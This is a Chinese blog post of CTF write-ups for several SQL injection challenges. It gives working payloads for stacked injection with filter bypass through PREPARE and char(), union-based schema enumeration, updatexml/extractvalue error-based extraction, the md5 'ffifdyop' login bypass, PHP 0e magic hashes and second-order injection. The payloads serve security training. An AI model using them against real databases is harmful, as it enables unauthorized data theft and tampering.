SQL注入题目

最新推荐文章于 2025-03-08 15:22:19 发布
最新推荐文章于 2025-03-08 15:22:19 发布
阅读量926 收藏 1
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_51911432/article/details/114900050
版权

极客大挑战2019 EasySQL

简单题,'发现注入点

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

写入1’ or 1=1 #

[强网杯 2019]随便注

堆叠注入

在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。

重命名 rename table name

  1. 1’ or 1=1# 发现注入点
  2. 1’ order by 3# 列表为二
  3. 1’ union select 1,database()# return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 回显出来这个,屏蔽了select
  4. 0’;show tables;# 回显string(16) “1919810931114514”
  5. 0’;desc `1919810931114514`;# 显示出存在列flag
  6. 0’;desc words;# 显示出id和data
  7. 接下来就是神奇的操作,查询语句很有可能是 : selsect id,data from words where id =,因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦
  8. 0’;rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
  9. id=1’ or 1=1#

预处理语句

PREPARE name from ‘[my sql sequece]’; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL 语句

SET @tn = ‘hahaha’; //存储表名
SET @sql = concat('select * from ', @tn); //存储SQL语句
PREPARE name from @sql; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句

本题即可利用 char() 函数将select的ASCII码转换为select字符串,接着利用concat()函数进行拼接得到select查询语句,从而绕过过滤。或者直接用concat()函数拼接select来绕过。
char(115,101,108,101,99,116)<----->‘select’

payload1: 不使用变量
0’;PREPARE hacker from concat(char(115,101,108,101,99,116), ’ * from `1919810931114514` ‘);EXECUTE hacker;#
payload2: 使用变量
0’;SET @sqli=concat(char(115,101,108,101,99,116),’* from `1919810931114514`’);PREPARE hacker from @sqli;EXECUTE hacker;#
payload3: 只是用contact(),不使用char()
0’;PREPARE hacker from concat(‘s’,‘elect’, ’ * from `1919810931114514` ');EXECUTE hacker;#

[SUCTF 2019]EasySQL

同样用堆叠注入

0;show databases; #
0;show tables; #

oracle 缺省

原理 select $_GET['query'] || flag from flag

在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式:pipes_as_concat 来实现oracle 的一些功能

1;set sql_mode=PIPES_AS_CONCAT;select 1

其他解: *,1

[极客大挑战 2019]LoveSQL

# 1.
?username=admin' order by 4%23&password=1
# 2.
?username=1' union select 1,database(),version()%23
&password=1 
# 3.
?username=1' union select 1,2,concat() # geek
# 4.
?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=1#geekuser,l0ve1ysq1
# 5.
?username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1 # id,username,password
# 6.
?username=1' union select 1,2,group_concat(username,password) from geek.l0ve1ysq1%23&password=1
flag{ab8c53a7-73d1-4a21-865e-5d435c907599}

[极客大挑战 2019]BabySQL

双写绕过

其他的与上个都差不多

[极客大挑战 2019]HardSQL

报错注入

用extractvalue和updatexml报错注入,过滤了空格和and'^'来连接函数,形成异或
username=1'or(updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1))%23&password=1
username=1&password=1'^extractvalue(1,concat(0x7e,(select(database()))))%23
或者用or隔开
用括号来代替空格
updataxml
1.database
	username=1'^(updatexml(1,concat(0x7e,(select(database())),0x7e),1))%23&password=1
	# geek
1.1 databases
	username=1'^(updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)),0x7e),1))%23&password=1
	# information_schema,mysql,perfor
2.table
	updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)
	H4rDsq1
3.column
	username=1&password=1'^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1)%23
	id,username,password
4.flag
	updatexml(1,concat(0x7e,(select(password)from(geek.H4rDsq1)),0x7e),1)%23
	updatexml(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)),0x7e),1)%23
	flag{ac019565-3a1f-4262-af23-49
	5-3a1f-4262-af23-49e873f8ae91}
    flag{ac019565-3a1f-4262-af23-49e873f8ae91}

extractvalue
1.database
	extractvalue(1,concat(0x7e,(select(database()))))%23
2.table
	extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
3.column
	extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%
4.password
	extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1)),0x7e))%23

[BJDCTF2020]Easy MD5

出现一个框
在这里插入图片描述

输入后可在headers看到
在这里插入图片描述

hint:select * from ‘admin’ where password=md5($pass,true)
构造$pass字符串经md5加密后出现’ or ',则可令该SQL语句返回true,与万能密码的原理相同。

像这样的字符串有:

129581926211651571912466741651878684928
ffifdyop

之后跳转到另一个网页

$a = $GET['a'];
$b = $_GET['b'];

if(\$a != $b && md5(\$a) == md5($b)){
    // wow, glzjin wants a girl friend.

需要我们构造两个字符串a和b,二者需不相同,但md5值却相同。想到了md5碰撞和数组绕过。

md5碰撞和数组绕过

关于md5碰撞,利用了PHP在使用“!=”、“==”比较哈希字符串时,会将0e开头的字符串当做0处理,因此如果字符串的md5值为0e开头,PHP认为它们是相等的。

数组绕过,主要利用了md5函数不能处理数组,当传入数组时,经md5加密后,都为null,相等。

md5后为0e开头的字符串

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

如何出现php

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

[RCTF2015]EasySQL

二次注入&XPATH注入

二次注入,有以下两步:
第一步:插入恶意数据
进行数据库插入数据时,对其中的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。
第二步:引用恶意数据
开发者默认存入数据库的数据都是安全的,在进行查询时,直接从数据库中取出恶意数据,没有进行进一步的检验的处理。.

输入1" 在改密码的时候报错
说明是双引号包裹
由于有报错回显,根据之前fuzz的过滤
可以考虑xpath注入

1"||extractvalue(1,concat(0x7e,(select(database()))))%23

1"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))))%23

1"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))))%23

假的,查user

1"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))))#

1"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))))#

flag{90d5fc9b-1e91-4261-8db9-d0
}301c620ed00d-9bd8-1624-19e1-b9 reserve
9b-1e91-4261-8db9-d00de026c103}
flag{90d5fc9b-1e91-4261-8db9-d00de026c103}

Pvr1sC
关注
sql各种注入案例
m0_69435261的博客
09-01 5651
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
sql注入考题
Kevinzkyy的博客
05-13 398
进入网址​ngo: the Web framework for perfectionists with deadline. 之后访问Log in | Django site admin 账号:admin 密码:a123123123 进入管理页面 点击Users右侧的Add添加用户 在添加用户界面输入用户名和密码 然后点击SVAE添加用户,并对用户信息进行完善 用户创建成功 ...
SQL注入SQL盲注(非常详细),零基础入门到精通,看这一篇就够了
最新发布
bigbangbangbang1的博客
03-08 1031
我们需要找到一个可能的注入点,如表单字段、URL参数等(可在正常的URL请求中截获信息,然后使用一些注入方式,如:1’ and 1=1 #和1’ and 1=2 #。(有的同仁可能会问这样一个一个的试,如果数据库名称长的话太浪费时间了,有没有简单或者自动化的方式,答案是有的,这是另一个话题,后面我们会详解 一 一介绍。(注:计算机中一般以大小写字母、数字、特殊符号来命名,其中为了达到统一的表示方法,ASII统一做了规定,如d对应的十进制是100,具体请查询ASII表。
SQL注入的问题:
u010930648的博客
06-25 432
问题描述:在利用sql语句进行查询的时候,如果我们按照传入的某个参数进行查询,例如当执行 read("' or 1 or '");时,相应的查询语句变为了 select id,name,money,birthday from user where name='' or 1or '';导致查询结果出错(or 1表示 当name为ture即存在时就满足条件),此时出现sql注入出错的问题。为此引入pr...
SQL注入的相关例题(ctfhub)
2401_82388450的博客
04-01 1289
例题。
CTF-web题之简单的SQL注入
qq_25046827的博客
11-24 5447
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
SQL注入相关【面试题
热门推荐
anan的博客
12-09 1万+
本篇文章主要收集和SQL注入相关的面试题,持续更新,当然由于博主的时间不太充裕,可能更新会不是很及时,但是相信我,再晚,他都会来!
sql注入相关题目
wangzhemvp的博客
03-31 513
2.输入 -1 union select databases--+ 没反应,可能存在过滤。information_schema.tables 或 .columns 用反引号。4.从数据库中查看文件内容,mysql提供了读取本地文件的函数load_file()在Switch中,case 里如果没有 break,则会继续向下执行 case。handler `表名` open as `a`;show columns from `表名`;(3)只要用户名密码正确,即可得到flag。联合注入与叠加注入区别。
SQL注入--题目
lulu001128的博客
07-26 583
解题过程
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
11-14 4033
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
一道简单的sql注入题目
weixin_44215027的博客
11-05 2093
一道简单的sql注入题目 好久都没有做ctf的题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
sql注入试题
m0_61990875的博客
11-08 1161
SQL注入类的面试答案
【CISP-PTE】SQL注入练习题
西原一点红的博客
06-26 2068
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
web buuctf [极客大挑战 2019]HardSQL1
weixin_44214568的博客
03-15 2145
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
bugku SQL注入题目合集
xuchen16的博客
09-30 2720
转载自:http://www.northity.com/2018/06/12/Bugku%E9%A2%98%E7%9B%AE%E9%9B%86%E9%94%A60x02/ SQL注入题目合集 这是一个神奇的登陆框 传送门 在用户名的后面加一个\可以看到报错,应该是能够报错注入或者联合查询之类的 但是最近学到了一些骚套路,先来看看sqlmap sqlmap 直接burp抓包另存为一个t...
记一次sql注入题目
BerL1n
11-25 396
前言 前几天在做上海赛中碰到一道sql注入题,很简单的一道题,过滤的也都fuzz出来了,绕过方法也找到了,还是没做出来,因为不能有单引号,一出现单引号就404,fuzz到其他敏感字都是提示禁用的,就是单引号会404,赛后看payload也是有单引号的,emmm…可能还是自己payload没写好吧。。原谅注入学的最菜的我,这里小记一下吧。 例题 通过一道题目记下思路和过程。 题目输入内容,然后可以...
SQL注入以及一些web题
2401_82388450的博客
04-03 945
1.进入页面,发现输入非零会有回显,输入零和字母就没有回显 2.此题使用堆叠注入,输入1;show databases;显示所有的库3.输入1;show tables;查所有的表4.输入1;show columns from Flag查flag表的字段,发现报错5.猜测过滤了一些内容,这里有两种方法构建payload:1.判断列数2.判断显错位3.爆数据库4.爆表名5.爆字段名6.爆数据,发现只有一半,想到使用substring()函数7. 发现substring()函数被过滤,使用mid函数,爆出后一半f
SQL注入专题(一)
彩色代码的博客
05-18 279
SQL注入SQL Injection)是一种常见的安全漏洞,它允许攻击者通过将恶意的SQL代码插入到应用程序的输入字段中,从而执行非授权的数据库操作。这些只是SQL注入的一些常见示例,实际情况可能更为复杂。为了防止SQL注入攻击,应使用参数化查询或预编译语句,使用安全的API和框架,并对用户输入进行充分验证和转义。
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值